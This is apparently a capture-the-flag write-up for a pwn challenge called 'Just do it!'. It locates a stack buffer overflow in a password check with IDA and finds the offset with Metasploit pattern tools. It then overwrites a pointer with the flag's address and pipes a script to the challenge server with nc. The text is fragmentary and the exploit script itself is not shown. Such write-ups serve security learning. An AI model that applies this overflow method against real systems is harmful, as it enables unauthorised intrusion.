Just do it!
Do it! Do it!
nc pwn1.chal.ctf.westerns.tokyo 12345
(Alternative port: nc pwn1.chal.ctf.westerns.tokyo 12482)
Starting by De-assembler with ida and use its ability to some c pseudo code:
int __cdecl main(int argc, const char **argv, const char **envp)
We can see clearly there is a buffer overflow problem on
strcmp PASSWORD comes from
STDIN, if we give a password greater than the variable s can handle, we will overflow in this one we don’t even need to modify the ret address. We can just modify the address from v6 to the flag variable address! which is stored from a file “flag.txt” in the server.
First lets just discover the offset we could know this by looking at the assembly code and check how space was saved in the stack for this variable by looking the offset from ebp or we can just use gdb with some help from metasploit to generate patterns:
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 50
We can see it broke at address
0x37614136 we again can calculate it in metasploit with pattern_offset
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x37614136
Now we can see we need to add more than 20 characters to overflow! now lets use IDA to get the address where is stored our flag:
And finally writing a script:
FLAG = 0x0804A080
getting the flag….
$ python justdoit.py | nc pwn1.chal.ctf.westerns.tokyo 12482
Welcome my secret service. Do you know the password?
Input the password.